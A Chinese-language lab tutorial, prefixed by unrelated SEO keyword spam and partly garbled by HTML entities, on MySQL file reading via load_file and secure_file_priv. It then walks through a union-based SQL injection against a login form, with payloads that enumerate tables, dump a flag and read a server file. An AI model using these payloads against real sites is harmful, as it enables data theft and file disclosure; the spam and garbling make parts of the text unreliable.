请输入您网站的icp备案信息,6间房直播,网站模板如何优化,广州网络优化最早的公司一、文件操作基础
show 先试试 show variables;发现显示了三百多行的系统变量: 这是数据库的目录#xff1a; mysql有多种编码方式#xff0c;有数据库编码、连接时的编码、还有客户端的编码#xff1a; 这里还有一个日志路径#xff0c;这个日志是需要手动打开的#…一、文件操作基础
show 先试试 show variables;发现显示了三百多行的系统变量: 这是数据库的目录 mysql有多种编码方式有数据库编码、连接时的编码、还有客户端的编码 这里还有一个日志路径这个日志是需要手动打开的但是打开这个日志数据库会大很多 这个记录的是主机的名字 mysql端口号默认3306 版本是5.5.53 这里记录的是机器的型号和操作系统的型号 我们看到mysql的variables变量非常多所以我们需要筛选一下这个时候就可以用通配符like
show variables like sec%;我们看到第二个选项secure_file_priv它的值是null它是文件读写相关的选项 我们用phpstudy快速的打开配置文件 之间在末尾添加一下后面没有任何值的因为不限制导入导出保存后mysql重启一下就可以生效 现在可以看到是什么都没有就表明mysql对导入导出不限制
load_file 我们本地第一下看看读完后发现是空值 本地flag的路径也是这个为什么会是空值呢事实上是因为我们的反斜杠\读取目录的时候是不能用反斜杠的得用普通的斜杠 这样就成功读取了 当我们把目录换到了mysql目录我们再去读就发现读不到了因为secure_file_priv的目录换到了mysql 目录就只能读mysql目录 我们读一下mysql目录下的文件成功读取了www的目录不能读取因为我们限制了读取目录 二、Load_file读文件
常规union联合查询注入
测试注入点
usernameadminpassworda闭合
usernameadmin and 11%23passworda测试列数
usernameadmin order by 3%23passworda测试回显位
usernamea union select 1,2,3%23passworda查库名
usernamea union select 1,database(),3%23passworda查表名
usernamea union select 1,group_concat(table_name),3 from information_schema.tables where table_schemadatabase()%23passworda查列名
usernamea union select 1,group_concat(column_name),3 from information_schema.columns where table_nameflag%23passworda查flag #输出了路径C:/phpstudy_pro/WWW/7/6/flag.txt
usernamea union select 1,flag,3 from flag%23passworda读文件
usernamea union select 1,load_file(C:/phpstudy_pro/WWW/7/6/flag.txt),3 %23passworda总结
load_file等读文件的函数受到secure-file-priv 选项的限制能不能使用load_file进行注入要看这个选项的配置
文件路径不能使用反斜线\要使用斜线/
